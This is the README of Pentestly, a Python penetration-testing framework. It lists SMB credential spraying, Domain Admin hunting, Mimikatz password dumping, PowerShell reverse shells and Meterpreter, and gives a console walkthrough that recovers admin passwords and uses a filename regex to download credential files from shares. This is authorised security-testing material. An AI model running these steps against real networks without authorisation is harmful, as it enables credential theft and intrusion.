Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.
Blog post: Pentestly Framework: When Pentesting Meets Python and Powershell
Author: @ctfhacker / Cory Duplantis
- Import NMAP XML
- Test SMB authentication using:
- individual credentials
- file containing credentials
- null credentials
- NTLM hash
- Test local administrator privileges for successful SMB authentication
- Identify readable SMB shares for valid credentials
- Store Domain/Enterprise Admin account names
- Determine location of running Domain Admin processes
- Determine systems of logged in Domain Admins
- Execute Powershell commands in memory and exfil results
- Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
- Receive a command shell (Powercat)
- Receive a meterpreter session (Invoke-Shellcode.ps1)
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
- - Allows us to execute Powershell commands quickly and easily via WMI
- - Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
powercat.ps1 - Netcat-esque functionality in Powershell
Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell
CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly
git clone
Let's walk through several functions currently implemented.
[pentestly][default] > workspaces list
| Workspaces |
| default |
[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options
Name Current Value Required Description
-------- ------------- -------- -----------
FILENAME /root/PROJECT/full-all-alive.xml yes Path and filename for nmap XML input
[pentestly][project][nmap_xml] > run
Use file with creds to test login
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
[pentestly][project][login] > set password ''
[pentestly][project][login] > run
Use single username password
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs i.e. over the found in the table
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts
> 1
[*] Execution creds: domain\Admin:adminpassword@
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run
| host | access | username | password | domain | process | logged_in | success | execute | module |
| | | nsportsman | password1! | zojix | | | True | True | login |
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run
| host | access | username | password | domain | process | logged_in | success | execute | module |
| | Domain Admin | TheRealDA | </l33TPassword> | zojix | | | True | True | login |
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})
[pentestly][default][interesting_files] > show pentestly_shares
| rowid | host | username | readwrite | readonly | noaccess | module |
| 1 | | Administrator | | ADMIN$,C,C$,Users | IPC$ | enumshares |
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Can change the pattern
to something a bit more specialized
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options
Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Execute and download found files
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
Creating new modules is easy in Pentestly. Begin with the code provided in
from libs.pentestlymodule import PentestlyModule
class Module(PentestlyModule):
meta = {
'name': 'Your module name goes here',
'author': 'Developer name goes here',
'description': 'Description of the module goes here',
'query': 'SQL QUERY whose result is passed to your module',
'options': (
('Option1', 'Default Value', Required-True/False, 'Description of option'),
def module_pre(self):
# Optional
# Happens before your module
def module_run(self, data):
# Required
# data is the result from the SQL query set in the options
### Few magic functions
# self.query - Perform an SQL query on the internal database
results = self.query("select * from pentestly_creds")
# self.output - print default information to the user
self.output("Performed an SQL query")
# self.alert - print successful message to the user
self.success("Yay! We performed successful work")
def module_post(self):
# Optional
# Happens after your module
The key points here are to fill the meta
dict with the corresponding information as well as the module_run
function for module functionality.
This script is then placed in the modules/
folder or in your personal ~/.pentestly/modules
folder for portability.
Stay tuned for a detailed example script explanation in the coming weeks.
- Implement
module - Add utility functions for database queries similar to
- Rework draw_table function to have fixed width columns
- Import credentials from Gladius
- Implement GPP password search and decrypt module
- Look into utilizing Invoke-Shellcode
Initial release